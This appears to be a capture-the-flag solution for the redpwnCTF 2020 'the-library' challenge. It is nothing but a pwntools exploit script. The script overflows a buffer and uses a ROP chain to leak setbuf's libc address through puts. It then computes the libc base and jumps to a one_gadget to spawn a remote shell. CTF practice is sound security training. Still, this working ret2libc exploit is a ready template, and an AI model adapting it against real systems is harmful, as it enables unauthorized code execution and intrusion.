Tags: ret2libc one_gadget
Rating:
```
from pwn import *
r=remote('2020.redpwnc.tf', 31350)
elf = ELF('the-library')
pop_rdi = 0x0000000000400733
r.sendlineafter('name?', 'a'*24+p64(pop_rdi) + p64(elf.got['setbuf'])+p64(elf.plt['puts'])+p64(elf.symbols['_start']))
print r.recvline()
print r.recvline()
print r.recvline()
setbuf_adr = u64(r.recvline().strip().ljust(8,'\x00'))
libc = ELF('libcso')
libc_off = setbuf_adr - libc.symbols['setbuf']
one_gadget = 0x4f322 + libc_off
print hex(libc_off)
r.sendlineafter('name?', 'a'*24+p64(one_gadget))
r.interactive()
```
